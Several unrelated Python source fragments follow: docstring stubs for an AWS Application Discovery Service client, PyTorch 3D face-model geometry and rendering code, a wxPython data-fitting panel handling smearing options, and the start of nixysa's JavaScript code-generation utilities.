'configurationType': 'SERVER'|'PROCESS'|'CONNECTION'|'APPLICATION',
'configurationId': 'string',
'key': 'string',
'value': 'string',
'timeOfCreation': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
"""
pass
def disassociate_configuration_items_from_application(applicationConfigurationId=None, configurationIds=None):
"""
Disassociates one or more configuration items from an application.
See also: AWS API Documentation
:example: response = client.disassociate_configuration_items_from_application(
applicationConfigurationId='string',
configurationIds=[
'string',
]
)
:type applicationConfigurationId: string
:param applicationConfigurationId: [REQUIRED]
Configuration ID of an application from which each item is disassociated.
:type configurationIds: list
:param configurationIds: [REQUIRED]
Configuration ID of each item to be disassociated from an application.
(string) --
:rtype: dict
:return: {}
:returns:
(dict) --
"""
pass
def export_configurations():
"""
Deprecated. Use StartExportTask instead.
Exports all discovered configuration data to an Amazon S3 bucket or an application that enables you to view and evaluate the data. Data includes tags and tag associations, processes, connections, servers, and system performance. This API returns an export ID that you can query using the DescribeExportConfigurations API. The system imposes a limit of two configuration exports in six hours.
See also: AWS API Documentation
:example: response = client.export_configurations()
:rtype: dict
:return: {
'exportId': 'string'
}
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
ClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
"""
pass
def get_discovery_summary():
"""
Retrieves a short summary of discovered assets.
See also: AWS API Documentation
:example: response = client.get_discovery_summary()
:rtype: dict
:return: {
'servers': 123,
'applications': 123,
'serversMappedToApplications': 123,
'serversMappedtoTags': 123,
'agentSummary': {
'activeAgents': 123,
'healthyAgents': 123,
'blackListedAgents': 123,
'shutdownAgents': 123,
'unhealthyAgents': 123,
'totalAgents': 123,
'unknownAgents': 123
},
'connectorSummary': {
'activeConnectors': 123,
'healthyConnectors': 123,
'blackListedConnectors': 123,
'shutdownConnectors': 123,
'unhealthyConnectors': 123,
'totalConnectors': 123,
'unknownConnectors': 123
}
}
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
"""
pass
def get_waiter():
"""
"""
pass
def list_configurations(configurationType=None, filters=None, maxResults=None, nextToken=None, orderBy=None):
"""
Retrieves a list of configuration items according to criteria that you specify in a filter. The filter criteria identifies the relationship requirements.
See also: AWS API Documentation
:example: response = client.list_configurations(
configurationType='SERVER'|'PROCESS'|'CONNECTION'|'APPLICATION',
filters=[
{
'name': 'string',
'values': [
'string',
],
'condition': 'string'
},
],
maxResults=123,
nextToken='string',
orderBy=[
{
'fieldName': 'string',
'sortOrder': 'ASC'|'DESC'
},
]
)
:type configurationType: string
:param configurationType: [REQUIRED]
A valid configuration identified by Application Discovery Service.
:type filters: list
:param filters: You can filter the request using various logical operators and a key -value format. For example:
{'key': 'serverType', 'value': 'webServer'}
For a complete list of filter options and guidance about using them with this action, see Querying Discovered Configuration Items .
(dict) --A filter that can use conditional operators.
For more information about filters, see Querying Discovered Configuration Items .
name (string) -- [REQUIRED]The name of the filter.
values (list) -- [REQUIRED]A string value on which to filter. For example, if you choose the destinationServer.osVersion filter name, you could specify Ubuntu for the value.
(string) --
condition (string) -- [REQUIRED]A conditional operator. The following operators are valid: EQUALS, NOT_EQUALS, CONTAINS, NOT_CONTAINS. If you specify multiple filters, the system utilizes all filters as though concatenated by AND . If you specify multiple values for a particular filter, the system differentiates the values using OR . Calling either DescribeConfigurations or ListConfigurations returns attributes of matching configuration items.
:type maxResults: integer
:param maxResults: The total number of items to return. The maximum value is 100.
:type nextToken: string
:param nextToken: Token to retrieve the next set of results. For example, if a previous call to ListConfigurations returned 100 items, but you set ListConfigurationsRequest$maxResults to 10, you received a set of 10 results along with a token. Use that token in this query to get the next set of 10.
:type orderBy: list
:param orderBy: Certain filter criteria return output that can be sorted in ascending or descending order. For a list of output characteristics for each filter, see Using the ListConfigurations Action .
(dict) --A field and direction for ordered output.
fieldName (string) -- [REQUIRED]The field on which to order.
sortOrder (string) --Ordering direction.
:rtype: dict
:return: {
'configurations': [
{
'string': 'string'
},
],
'nextToken': 'string'
}
| |
<gh_stars>100-1000
import torch
import math
import numpy as np
from utils import LeastSquares
def split_coeff(coeff):
# input: coeff with shape [1,257]
id_coeff = coeff[:, :80] # identity(shape) coeff of dim 80
ex_coeff = coeff[:, 80:144] # expression coeff of dim 64
tex_coeff = coeff[:, 144:224] # texture(albedo) coeff of dim 80
angles = coeff[:, 224:227] # ruler angles(x,y,z) for rotation of dim 3
# lighting coeff for 3 channel SH function of dim 27
gamma = coeff[:, 227:254]
translation = coeff[:, 254:] # translation coeff of dim 3
return id_coeff, ex_coeff, tex_coeff, angles, gamma, translation
class _need_const:
a0 = np.pi
a1 = 2 * np.pi / np.sqrt(3.0)
a2 = 2 * np.pi / np.sqrt(8.0)
c0 = 1 / np.sqrt(4 * np.pi)
c1 = np.sqrt(3.0) / np.sqrt(4 * np.pi)
c2 = 3 * np.sqrt(5.0) / np.sqrt(12 * np.pi)
d0 = 0.5 / np.sqrt(3.0)
illu_consts = [a0, a1, a2, c0, c1, c2, d0]
origin_size = 300
target_size = 224
camera_pos = 10.0
def shape_formation(id_coeff, ex_coeff, facemodel):
# compute face shape with identity and expression coeff, based on BFM model
# input: id_coeff with shape [1,80]
# ex_coeff with shape [1,64]
# output: face_shape with shape [1,N,3], N is number of vertices
'''
S = mean_shape + \alpha * B_id + \beta * B_exp
'''
n_b = id_coeff.size(0)
face_shape = torch.einsum('ij,aj->ai', facemodel.idBase, id_coeff) + \
torch.einsum('ij,aj->ai', facemodel.exBase, ex_coeff) + \
facemodel.meanshape
face_shape = face_shape.view(n_b, -1, 3)
# re-center face shape
face_shape = face_shape - \
facemodel.meanshape.view(1, -1, 3).mean(dim=1, keepdim=True)
return face_shape
def texture_formation(tex_coeff, facemodel):
# compute vertex texture(albedo) with tex_coeff
# input: tex_coeff with shape [1,N,3]
# output: face_texture with shape [1,N,3], RGB order, range from 0-255
'''
T = mean_texture + \gamma * B_texture
'''
n_b = tex_coeff.size(0)
face_texture = torch.einsum(
'ij,aj->ai', facemodel.texBase, tex_coeff) + facemodel.meantex
face_texture = face_texture.view(n_b, -1, 3)
return face_texture
def compute_norm(face_shape, facemodel):
# compute vertex normal using one-ring neighborhood (8 points)
# input: face_shape with shape [1,N,3]
# output: v_norm with shape [1,N,3]
# https://fredriksalomonsson.files.wordpress.com/2010/10/mesh-data-structuresv2.pdf
# vertex index for each triangle face, with shape [F,3], F is number of faces
face_id = facemodel.tri - 1
# adjacent face index for each vertex, with shape [N,8], N is number of vertex
point_id = facemodel.point_buf - 1
shape = face_shape
v1 = shape[:, face_id[:, 0], :]
v2 = shape[:, face_id[:, 1], :]
v3 = shape[:, face_id[:, 2], :]
e1 = v1 - v2
e2 = v2 - v3
face_norm = e1.cross(e2) # compute normal for each face
# normalized face_norm first
face_norm = torch.nn.functional.normalize(face_norm, p=2, dim=2)
empty = torch.zeros((face_norm.size(0), 1, 3),
dtype=face_norm.dtype, device=face_norm.device)
# concat face_normal with a zero vector at the end
face_norm = torch.cat((face_norm, empty), 1)
# compute vertex normal using one-ring neighborhood
v_norm = face_norm[:, point_id, :].sum(dim=2)
v_norm = torch.nn.functional.normalize(v_norm, p=2, dim=2) # normalize normal vectors
return v_norm
def compute_rotation_matrix(angles):
# compute rotation matrix based on 3 ruler angles
# input: angles with shape [1,3]
# output: rotation matrix with shape [1,3,3]
n_b = angles.size(0)
# https://www.cnblogs.com/larry-xia/p/11926121.html
device = angles.device
# compute rotation matrix for X-axis, Y-axis, Z-axis respectively
rotation_X = torch.cat(
[
torch.ones([n_b, 1]).to(device),
torch.zeros([n_b, 3]).to(device),
torch.reshape(torch.cos(angles[:, 0]), [n_b, 1]),
- torch.reshape(torch.sin(angles[:, 0]), [n_b, 1]),
torch.zeros([n_b, 1]).to(device),
torch.reshape(torch.sin(angles[:, 0]), [n_b, 1]),
torch.reshape(torch.cos(angles[:, 0]), [n_b, 1])
],
axis=1
)
rotation_Y = torch.cat(
[
torch.reshape(torch.cos(angles[:, 1]), [n_b, 1]),
torch.zeros([n_b, 1]).to(device),
torch.reshape(torch.sin(angles[:, 1]), [n_b, 1]),
torch.zeros([n_b, 1]).to(device),
torch.ones([n_b, 1]).to(device),
torch.zeros([n_b, 1]).to(device),
- torch.reshape(torch.sin(angles[:, 1]), [n_b, 1]),
torch.zeros([n_b, 1]).to(device),
torch.reshape(torch.cos(angles[:, 1]), [n_b, 1]),
],
axis=1
)
rotation_Z = torch.cat(
[
torch.reshape(torch.cos(angles[:, 2]), [n_b, 1]),
- torch.reshape(torch.sin(angles[:, 2]), [n_b, 1]),
torch.zeros([n_b, 1]).to(device),
torch.reshape(torch.sin(angles[:, 2]), [n_b, 1]),
torch.reshape(torch.cos(angles[:, 2]), [n_b, 1]),
torch.zeros([n_b, 3]).to(device),
torch.ones([n_b, 1]).to(device),
],
axis=1
)
rotation_X = rotation_X.reshape([n_b, 3, 3])
rotation_Y = rotation_Y.reshape([n_b, 3, 3])
rotation_Z = rotation_Z.reshape([n_b, 3, 3])
# R = Rz*Ry*Rx
rotation = rotation_Z.bmm(rotation_Y).bmm(rotation_X)
# because our face shape is N*3, so compute the transpose of R, so that rotation shapes can be calculated as face_shape*R
rotation = rotation.permute(0, 2, 1)
return rotation
def projection_layer(face_shape, fx=1015.0, fy=1015.0, px=112.0, py=112.0):
# we choose the focal length and camera position empirically
# project 3D face onto image plane
# input: face_shape with shape [1,N,3]
# rotation with shape [1,3,3]
# translation with shape [1,3]
# output: face_projection with shape [1,N,2]
# z_buffer with shape [1,N,1]
cam_pos = 10
p_matrix = np.concatenate([[fx], [0.0], [px], [0.0], [fy], [py], [0.0], [0.0], [1.0]],
axis=0).astype(np.float32) # projection matrix
p_matrix = np.reshape(p_matrix, [1, 3, 3])
p_matrix = torch.from_numpy(p_matrix)
gpu_p_matrix = None
n_b, nV, _ = face_shape.size()
if face_shape.is_cuda:
gpu_p_matrix = p_matrix.cuda()
p_matrix = gpu_p_matrix.expand(n_b, 3, 3)
else:
p_matrix = p_matrix.expand(n_b, 3, 3)
face_shape[:, :, 2] = cam_pos - face_shape[:, :, 2]
aug_projection = face_shape.bmm(p_matrix.permute(0, 2, 1))
face_projection = aug_projection[:, :, 0:2] / aug_projection[:, :, 2:]
z_buffer = cam_pos - aug_projection[:, :, 2:]
return face_projection, z_buffer
def illumination_layer(face_texture, norm, gamma):
# CHJ: It's different from what I knew.
# compute vertex color using face_texture and SH function lighting approximation
# input: face_texture with shape [1,N,3]
# norm with shape [1,N,3]
# gamma with shape [1,27]
# output: face_color with shape [1,N,3], RGB order, range from 0-255
# lighting with shape [1,N,3], color under uniform texture
n_b, num_vertex, _ = face_texture.size()
n_v_full = n_b * num_vertex
gamma = gamma.view(-1, 3, 9).clone()
gamma[:, :, 0] += 0.8
gamma = gamma.permute(0, 2, 1)
a0, a1, a2, c0, c1, c2, d0 = _need_const.illu_consts
Y0 = torch.ones(n_v_full).float() * a0*c0
if gamma.is_cuda:
Y0 = Y0.cuda()
norm = norm.view(-1, 3)
nx, ny, nz = norm[:, 0], norm[:, 1], norm[:, 2]
arrH = []
arrH.append(Y0)
arrH.append(-a1*c1*ny)
arrH.append(a1*c1*nz)
arrH.append(-a1*c1*nx)
arrH.append(a2*c2*nx*ny)
arrH.append(-a2*c2*ny*nz)
arrH.append(a2*c2*d0*(3*nz.pow(2)-1))
arrH.append(-a2*c2*nx*nz)
arrH.append(a2*c2*0.5*(nx.pow(2)-ny.pow(2)))
H = torch.stack(arrH, 1)
Y = H.view(n_b, num_vertex, 9)
# Y shape:[batch,N,9].
# shape:[batch,N,3]
lighting = Y.bmm(gamma)
face_color = face_texture * lighting
return face_color, lighting
def rigid_transform(face_shape, rotation, translation):
n_b = face_shape.shape[0]
face_shape_r = face_shape.bmm(rotation) # R has been transposed
face_shape_t = face_shape_r + translation.view(n_b, 1, 3)
return face_shape_t
def compute_landmarks(face_shape, facemodel):
# compute 3D landmark postitions with pre-computed 3D face shape
keypoints_idx = facemodel.keypoints - 1
face_landmarks = face_shape[:, keypoints_idx, :]
return face_landmarks
def compute_3d_landmarks(face_shape, facemodel, angles, translation):
rotation = compute_rotation_matrix(angles)
face_shape_t = rigid_transform(face_shape, rotation, translation)
landmarks_3d = compute_landmarks(face_shape_t, facemodel)
return landmarks_3d
def transform_face_shape(face_shape, angles, translation):
rotation = compute_rotation_matrix(angles)
face_shape_t = rigid_transform(face_shape, rotation, translation)
return face_shape_t
def render_img(face_shape, face_color, facemodel, image_size=224, fx=1015.0, fy=1015.0, px=112.0, py=112.0, device='cuda:0'):
'''
ref: https://github.com/facebookresearch/pytorch3d/issues/184
The rendering function (just for test)
Input:
face_shape: Tensor[1, 35709, 3]
face_color: Tensor[1, 35709, 3] in [0, 1]
facemodel: contains `tri` (triangles[70789, 3], index start from 1)
'''
from pytorch3d.structures import Meshes
from pytorch3d.renderer.mesh.textures import TexturesVertex
from pytorch3d.renderer import (
PerspectiveCameras,
PointLights,
RasterizationSettings,
MeshRenderer,
MeshRasterizer,
SoftPhongShader,
BlendParams
)
face_color = TexturesVertex(verts_features=face_color.to(device))
face_buf = torch.from_numpy(facemodel.tri - 1) # index start from 1
face_idx = face_buf.unsqueeze(0)
mesh = Meshes(face_shape.to(device), face_idx.to(device), face_color)
R = torch.eye(3).view(1, 3, 3).to(device)
R[0, 0, 0] *= -1.0
T = torch.zeros([1, 3]).to(device)
half_size = (image_size - 1.0) / 2
focal_length = torch.tensor([fx / half_size, fy / half_size], dtype=torch.float32).reshape(1, 2).to(device)
principal_point = torch.tensor([(half_size - px) / half_size, (py - half_size) / half_size], dtype=torch.float32).reshape(1, 2).to(device)
cameras = PerspectiveCameras(
device=device,
R=R,
T=T,
focal_length=focal_length,
principal_point=principal_point
)
raster_settings = RasterizationSettings(
image_size=image_size,
blur_radius=0.0,
faces_per_pixel=1
)
lights = PointLights(
device=device,
ambient_color=((1.0, 1.0, 1.0),),
diffuse_color=((0.0, 0.0, 0.0),),
specular_color=((0.0, 0.0, 0.0),),
location=((0.0, 0.0, 1e5),)
)
blend_params = BlendParams(background_color=(0.0, 0.0, 0.0))
renderer = MeshRenderer(
rasterizer=MeshRasterizer(
cameras=cameras,
raster_settings=raster_settings
),
shader=SoftPhongShader(
device=device,
cameras=cameras,
lights=lights,
blend_params=blend_params
)
)
images = renderer(mesh)
images = torch.clamp(images, 0.0, 1.0)
return images
def estimate_intrinsic(landmarks_2d, transform_params, z_buffer, face_shape, facemodel, angles, translation):
# estimate intrinsic parameters
def re_convert(landmarks_2d, trans_params, origin_size=_need_const.origin_size, target_size=_need_const.target_size):
# convert landmarks to un_cropped images
w = (origin_size * trans_params[2]).astype(np.int32)
h = (origin_size * trans_params[2]).astype(np.int32)
landmarks_2d[:, :, 1] = target_size - 1 - landmarks_2d[:, :, 1]
landmarks_2d[:, :, 0] = landmarks_2d[:, :, 0] + w / 2 - target_size / 2
landmarks_2d[:, :, 1] = landmarks_2d[:, :, 1] + h / 2 - target_size / 2
landmarks_2d = landmarks_2d / trans_params[2]
landmarks_2d[:, :, 0] = landmarks_2d[:, :, 0] + trans_params[3] - origin_size / 2
| |
chi2
chi2 = format_number(chisqr, True)
self.tcChi.SetValue(chi2)
self.tcChi.Refresh()
else:
self.tcChi.SetValue("-")
# Hide error title
if self.text2_3.IsShown() and not self.is_mac:
self.text2_3.Hide()
try:
if self.enable_disp.GetValue():
if hasattr(self, "text_disp_1"):
if self.text_disp_1 is not None and not self.is_mac:
self.text_disp_1.Hide()
except:
dispersity = None
pass
i = 0
# Set the panel when fit result are list
for item in self.param_toFit:
if len(item) > 5 and item is not None:
if item[0].IsShown():
# reset error value to initial state
if not self.is_mac:
item[3].Hide()
item[4].Hide()
for ind in range(len(out)):
if item[1] == p_name[ind]:
break
if len(out) > 0 and out[ind] is not None:
val_out = format_number(out[ind], True)
item[2].SetValue(val_out)
if(cov is not None and len(cov) == len(out)):
try:
if dispersity is not None:
if self.enable_disp.GetValue():
if hasattr(self, "text_disp_1"):
if self.text_disp_1 is not None:
if not self.text_disp_1.IsShown()\
and not self.is_mac:
self.text_disp_1.Show(True)
except:
pass
if cov[ind] is not None:
if np.isfinite(float(cov[ind])):
val_err = format_number(cov[ind], True)
item[4].SetForegroundColour(wx.BLACK)
else:
val_err = 'NaN'
item[4].SetForegroundColour(wx.RED)
if not self.is_mac:
item[3].Show(True)
item[4].Show(True)
item[4].SetValue(val_err)
has_error = True
i += 1
else:
raise ValueError("onsetValues: Invalid parameters...")
# Show error title when any errors displayed
if has_error:
if not self.text2_3.IsShown():
self.text2_3.Show(True)
# save current state
self.save_current_state()
if not self.is_mac:
self.Layout()
self.Refresh()
# plot model ( when drawing, do not update chisqr value again)
self._draw_model(update_chisqr=False, source='fit')
def onWeighting(self, event):
"""
On Weighting radio button event, sets the weightbt_string
"""
self.weightbt_string = event.GetEventObject().GetLabelText()
self._set_weight()
def _set_weight(self, is_2D=None):
"""
Set weight in fit problem
"""
# compute weight for the current data
flag_weight = self.get_weight_flag()
if is_2D is None:
is_2D = self._is_2D()
self._manager.set_fit_weight(uid=self.uid,
flag=flag_weight,
is2d=is_2D,
fid=None)
def onPinholeSmear(self, event):
"""
Create a custom pinhole smear object that will change the way residuals
are compute when fitting
:Note: accuracy is given by strings'High','Med', 'Low' FOR 2d,
None for 1D
"""
# Need update param values
self._update_paramv_on_fit()
if event is not None:
tcrtl = event.GetEventObject()
# event case of radio button
if tcrtl.GetValue():
self.dx_percent = 0.0
is_new_pinhole = True
else:
is_new_pinhole = self._is_changed_pinhole()
else:
is_new_pinhole = True
# if any value is changed
if is_new_pinhole:
self._set_pinhole_smear()
# hide all silt sizer
self._hide_all_smear_info()
# show relevant slit sizers
self._show_smear_sizer()
self.sizer_set_smearer.Layout()
# we need FitInside here not just self.Layout to ensure all the sizers
# end up with the necessasary space to in the scroll panel. In
# particular the compute and fit buttons end up on top of each other
# PDB Nov 28 2015.
self.FitInside()
if event is not None:
event.Skip()
# self._undo.Enable(True)
self.save_current_state()
event = PageInfoEvent(page=self)
wx.PostEvent(self.parent, event)
def _is_changed_pinhole(self):
"""
check if any of pinhole smear is changed
:return: True or False
"""
# get the values
pin_percent = self.smear_pinhole_percent.GetValue()
# Check changes in slit heigth
try:
dx_percent = float(pin_percent)
except:
return True
if self.dx_percent != dx_percent:
return True
return False
def _set_pinhole_smear(self):
"""
Set custom pinhole smear
:return: msg
"""
# copy data
data = copy.deepcopy(self.data)
if self._is_2D():
self.smear_type = 'Pinhole2d'
len_data = len(data.data)
data.dqx_data = np.zeros(len_data)
data.dqy_data = np.zeros(len_data)
else:
self.smear_type = 'Pinhole'
len_data = len(data.x)
data.dx = np.zeros(len_data)
data.dxl = None
data.dxw = None
msg = None
get_pin_percent = self.smear_pinhole_percent
if not check_float(get_pin_percent):
get_pin_percent.SetBackgroundColour("pink")
msg = "Model Error:wrong value entered!!!"
else:
if len_data < 2:
len_data = 2
self.dx_percent = float(get_pin_percent.GetValue())
if self.dx_percent < 0:
get_pin_percent.SetBackgroundColour("pink")
msg = "Model Error:This value can not be negative!!!"
elif self.dx_percent is not None:
percent = self.dx_percent/100
if self._is_2D():
q = np.sqrt(data.qx_data**2 + data.qy_data**2)
data.dqx_data = data.dqy_data = percent*q
else:
data.dx = percent * data.x
self.current_smearer = smear_selection(data, self.model)
# 2D need to set accuracy
if self._is_2D():
self.current_smearer.set_accuracy(
accuracy=self.smear2d_accuracy)
if msg is not None:
wx.PostEvent(self._manager.parent, StatusEvent(status=msg))
else:
get_pin_percent.SetBackgroundColour("white")
# set smearing value whether or not the data contain the smearing info
enable_smearer = not self.disable_smearer.GetValue()
self._manager.set_smearer(smearer=self.current_smearer,
fid=self.data.id,
qmin=float(self.qmin_x),
qmax=float(self.qmax_x),
enable_smearer=enable_smearer,
uid=self.uid)
return msg
def update_pinhole_smear(self):
"""
called by kill_focus on pinhole TextCntrl
to update the changes
:return: False when wrong value was entered
"""
# msg default
msg = None
# check if any value is changed
if self._is_changed_pinhole():
msg = self._set_pinhole_smear()
wx.CallAfter(self.save_current_state)
if msg is not None:
return False
else:
return True
def onSlitSmear(self, event):
"""
Create a custom slit smear object that will change the way residuals
are compute when fitting
"""
# Need update param values
self._update_paramv_on_fit()
# msg default
msg = None
# for event given
if event is not None:
tcrtl = event.GetEventObject()
# event case of radio button
if tcrtl.GetValue():
self.dxl = 0.0
self.dxw = 0.0
is_new_slit = True
else:
is_new_slit = self._is_changed_slit()
else:
is_new_slit = True
# if any value is changed
if is_new_slit:
msg = self._set_slit_smear()
# hide all silt sizer
self._hide_all_smear_info()
# show relevant slit sizers
self._show_smear_sizer()
self.sizer_set_smearer.Layout()
# we need FitInside here not just self.Layout to ensure all the sizers
# end up with the necessasary space to in the scroll panel. In
# particular the compute and fit buttons end up on top of each other
# PDB Nov 28 2015.
self.FitInside()
if event is not None:
event.Skip()
self.save_current_state()
event = PageInfoEvent(page=self)
wx.PostEvent(self.parent, event)
if msg is not None:
wx.PostEvent(self._manager.parent, StatusEvent(status=msg))
def _is_changed_slit(self):
"""
check if any of slit lengths is changed
:return: True or False
"""
# get the values
width = self.smear_slit_width.GetValue()
height = self.smear_slit_height.GetValue()
# check and change the box bg color if it was pink
# but it should be white now
# because this is the case that _set_slit_smear() will not handle
if height.lstrip().rstrip() == "":
self.smear_slit_height.SetBackgroundColour(wx.WHITE)
if width.lstrip().rstrip() == "":
self.smear_slit_width.SetBackgroundColour(wx.WHITE)
# Check changes in slit width
if width == "":
dxw = 0.0
else:
try:
dxw = float(width)
except:
return True
if self.dxw != dxw:
return True
# Check changes in slit heigth
if height == "":
dxl = 0.0
else:
try:
dxl = float(height)
except:
return True
if self.dxl != dxl:
return True
return False
def _set_slit_smear(self):
"""
Set custom slit smear
:return: message to inform the user about the validity
of the values entered for slit smear
"""
if isinstance(self.data, Data2D) or self.enable2D:
return
# make sure once more if it is smearer
data = copy.deepcopy(self.data)
data_len = len(data.x)
data.dx = None
data.dxl = None
data.dxw = None
msg = None
try:
self.dxl = float(self.smear_slit_height.GetValue())
data.dxl = self.dxl * np.ones(data_len)
self.smear_slit_height.SetBackgroundColour(wx.WHITE)
except:
self.dxl = None
data.dxl = np.zeros(data_len)
if self.smear_slit_height.GetValue().lstrip().rstrip() != "":
self.smear_slit_height.SetBackgroundColour("pink")
msg = "Wrong value entered... "
else:
self.smear_slit_height.SetBackgroundColour(wx.WHITE)
try:
self.dxw = float(self.smear_slit_width.GetValue())
self.smear_slit_width.SetBackgroundColour(wx.WHITE)
data.dxw = self.dxw * np.ones(data_len)
except:
self.dxw = None
data.dxw = np.zeros(data_len)
if self.smear_slit_width.GetValue().lstrip().rstrip() != "":
self.smear_slit_width.SetBackgroundColour("pink")
msg = "Wrong Fit value entered... "
else:
self.smear_slit_width.SetBackgroundColour(wx.WHITE)
self.current_smearer = smear_selection(data, self.model)
# set smearing value whether or not the data contain the smearing info
enable_smearer = not self.disable_smearer.GetValue()
self._manager.set_smearer(smearer=self.current_smearer,
fid=self.data.id,
qmin=float(self.qmin_x),
qmax=float(self.qmax_x),
enable_smearer=enable_smearer,
uid=self.uid)
return msg
def update_slit_smear(self):
"""
called by kill_focus on pinhole TextCntrl
to update the changes
:return: False when wrong value was entered
"""
# msg default
msg = None
# check if any value is changed
if self._is_changed_slit():
msg = self._set_slit_smear()
# self._undo.Enable(True)
self.save_current_state()
if msg is not None:
return False
else:
return True
def onSmear(self, event):
"""
Create a smear object that will change the way residuals
are computed when fitting
"""
if event is not None:
event.Skip()
if self.data is None:
return
# Need update param values
self._update_paramv_on_fit()
if self.model is not None:
if self.data.is_data:
self._manager.page_finder[self.uid].add_data(data=self.data)
temp_smearer = self.on_smear_helper()
self.sizer_set_smearer.Layout()
# we need FitInside here not just self.Layout to ensure all the sizers
# end up with the necessasary space to in the scroll panel. In
# particular the compute and fit buttons end up on top of each other
# PDB Nov 28 2015.
self.FitInside()
self._set_weight()
# set smearing value whether or not the data contain the smearing info
enable_smearer = not self.disable_smearer.GetValue()
wx.CallAfter(self._manager.set_smearer, uid=self.uid,
smearer=temp_smearer,
fid=self.data.id,
qmin=float(self.qmin_x),
qmax=float(self.qmax_x),
enable_smearer=enable_smearer)
self.state.enable_smearer = self.enable_smearer.GetValue()
self.state.disable_smearer = self.disable_smearer.GetValue()
self.state.pinhole_smearer = self.pinhole_smearer.GetValue()
self.state.slit_smearer = self.slit_smearer.GetValue()
def on_smear_helper(self, update=False):
"""
Help for onSmear
:param update: | |
<filename>nixysa/js_utils.py
#!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for Javascript code generation.
This module contains a few utilities for Javascript code generation.
"""
import re
import sys
import naming
import gflags
import log
import cpp_utils
import writer
_doxygen_tag_re = re.compile(r'\s*\\(\w+) ')
_param_re = re.compile(r'\s*\\param (\w+) (.*?)$')
_non_id_re = re.compile(r'[^A-Z0-9_]')
def GetScopePrefix(scope, type_defn, scope_operator):
"""Gets the prefix string to reference a type from a given scope.
This function returns a concatenation of js scope operators such as, in the
context of the given scope, when prefixing the name of the given type, it
will reference exactly that type.
For example, given:
namespace A {
namespace B {
class C;
}
namespace D {
void F();
}
}
To access C from F, one needs to refer to it by B::C. This function will
return the 'B::' part.
Args:
scope: the Definition for the scope from which the type must be accessed.
type_defn: the Definition for the type which must be accessed.
scope_operator: the scope operator for your language, ie '.' or '::'
Returns:
the prefix string.
"""
return cpp_utils.GetScopePrefixWithScopeOperator(scope, type_defn, '.')
def GetScopedName(scope, type_defn):
"""Gets the prefix string to reference a type from a given scope.
This function returns a concatenation of C++ scope operators such as, in the
context of the given scope, when prefixing the name of the given type, it
will reference exactly that type.
For example, given:
namespace A {
namespace B {
class C;
}
namespace D {
void F();
}
}
To access C from F, one needs to refer to it by B::C. This function will
return exactly that.
Args:
scope: the Definition for the scope from which the type must be accessed.
type_defn: the Definition for the type which must be accessed.
Returns:
the scoped reference string.
"""
return GetScopePrefix(scope, type_defn) + type_defn.name
def GetFullyQualifiedScopePrefix(scope):
"""Gets the fully qualified scope prefix.
Args:
scope: the Definition for the scope from which the type must be accessed.
Returns:
the fully qualified scope prefix string.
"""
scope_stack = scope.GetParentScopeStack() + [scope]
return '.'.join([s.name for s in scope_stack[1:]] + [''])
def GetFullyQualifiedTypeName(type_defn):
"""Gets the fully qualified name for a type
Args:
type_defn: the type definition you want a name for.
Returns:
the fully qualified name string.
"""
return type_defn.binding_model.JSDocTypeString(type_defn)
def GetFullyQualifiedTypeString(type_defn):
"""
"""
type_defn = type_defn.GetFinalType()
type_stack = type_defn.GetParentScopeStack()
name = type_defn.name
return '.'.join([s.name for s in type_stack[1:]] + [name])
def GetGetterName(field):
"""Gets the name of the getter function for a member field.
Unless overridden by the 'getter' attribute in IDL, the default name for the
getter function is the name of the field, normalized to the lower-case
convention.
Args:
field: the Definition for the field.
Returns:
the name of the getter function.
"""
return (field.attributes['getter'] or naming.Normalize(field.name,
naming.Lower))
def GetSetterName(field):
"""Gets the name of the setter function for a member field.
Unless overridden by the 'setter' attribute in IDL, the default name for the
setter function is 'set_' concatenated with the name of the field, normalized
to the lower-case convention.
Args:
field: the Definition for the field.
Returns:
the name of the setter function.
"""
return (field.attributes['setter'] or
'set_%s' % naming.Normalize(field.name, naming.Lower))
def GetFunctionParamPrototype(scope, param):
"""Gets the string needed to declare a parameter in a function prototype.
Args:
scope: the scope of the prototype.
param: the Function.Param to declare
Returns:
a (string, list) pair. The string is the declaration of the parameter in
the prototype. The list contains (nam, Definition) pairs, describing the
types that need to be forward-declared (bool is false) or defined (bool is
true).
"""
bm = param.type_defn.binding_model
if param.mutable:
text, need_defn = bm.CppMutableParameterString(scope, param.type_defn)
else:
text, need_defn = bm.CppParameterString(scope, param.type_defn)
name = naming.Normalize(param.name, naming.Java)
return name, [(name, param.type_defn)]
def GetFunctionPrototype(scope, obj, member):
"""Gets the string needed to declare a function prototype.
Args:
scope: the scope of the prototype.
obj: the function to declare.
member: True if member function
Returns:
A string prototype.
"""
id_prefix = GetFullyQualifiedScopePrefix(scope)
proto = ''
if member:
proto = 'prototype.'
param_strings = [GetFunctionParamPrototype(scope, p)[0] for p in obj.params]
param_string = ', '.join(param_strings)
prototype = '%s%s%s = function(%s) { };' % (
id_prefix, proto, naming.Normalize(obj.name, naming.Java), param_string)
return prototype
def GetFunctionParamType(obj, param_name):
"""Gets the type of a function param.
Args:
obj: The function.
param_name: The name of the parameter.
Returns
A string which is the type of the parameter.
"""
if param_name[-1] == '?':
param_name = param_name[:-1]
for p in obj.params:
if p.name == param_name:
return GetFullyQualifiedTypeName(p.type_defn)
log.SourceError(obj.source, 'No param "%s" on function "%s"' %
(param_name, obj.name))
return '*'
def GetCommentsForParams(func):
"""Gets the comments for the params.
Args:
func: The function.
